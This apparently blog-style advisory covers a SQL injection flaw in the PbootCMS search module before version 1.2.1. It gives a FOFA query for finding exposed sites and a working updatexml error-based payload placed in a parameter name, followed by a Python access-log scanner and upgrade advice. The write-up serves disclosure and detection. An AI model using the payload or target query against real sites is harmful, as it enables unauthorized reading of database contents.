PbootCMS search SQL injection vulnerability
2022-07-17 23:17:00 【孤桜懶契】
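Vulnerability description
The search module of PbootCMS has a SQL injection vulnerability. It can be used to obtain sensitive information from the database.
Affected versions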
PbootCMS < 1.2.1
Asset discovery
FOFA: app="PBOOTCMS"
Reproduction
The search box page is:

The payload is:
/index.php/Search/index?keyword=123&updatexml(1,concat(0x7e,user(),0x7e),1));%23=123
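
In the payload above, the SQL expression sits in the name of the second query parameter rather than in the value of keyword, so a filter that inspects only parameter values does not see it. The following log check is an added example, not code from the original post or from PbootCMS; the access log format, the allow-list pattern, the sample log lines and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Allow-list for legitimate parameter names (an assumption for this example).
SAFE_NAME = re.compile(r"[A-Za-z0-9_\-\[\]]{1,64}")
# Request target inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines; the second carries the payload from this page.
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Jul/2022:23:10:01 +0800] "GET /index.php/Search/index?keyword=phone HTTP/1.1" 200 5120',
    '192.0.2.44 - - [17/Jul/2022:23:10:07 +0800] "GET /index.php/Search/index?keyword=123&updatexml(1,concat(0x7e,user(),0x7e),1));%23=123 HTTP/1.1" 200 812',
    '192.0.2.10 - - [17/Jul/2022:23:10:09 +0800] "GET /index.php/About/index?id=3 HTTP/1.1" 200 2048',
]


def suspicious_param_names(target):
    """Return decoded query parameter names that are not plain identifiers."""
    parts = urlsplit(target)
    if "/search/index" not in parts.path.lower():
        return []
    # Split on "&" only, so a ";" inside a name stays part of that name.
    names = [unquote_plus(f.partition("=")[0]) for f in parts.query.split("&") if f]
    return [name for name in names if not SAFE_NAME.fullmatch(name)]


def scan(log_lines):
    """Yield (line_number, names) for each entry with a suspicious parameter name."""
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if match:
            names = suspicious_param_names(match.group(1))
            if names:
                yield number, names


if __name__ == "__main__":
    for number, names in scan(SAMPLE_LOG):
        print(f"line {number}: suspicious parameter name(s): {names}")
```

The same name check can be applied at a reverse proxy or in application input handling to reject such requests before they reach the search module; upgrading past the affected versions remains the fix.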

My personal blog
https://gylq.gitee.io/time/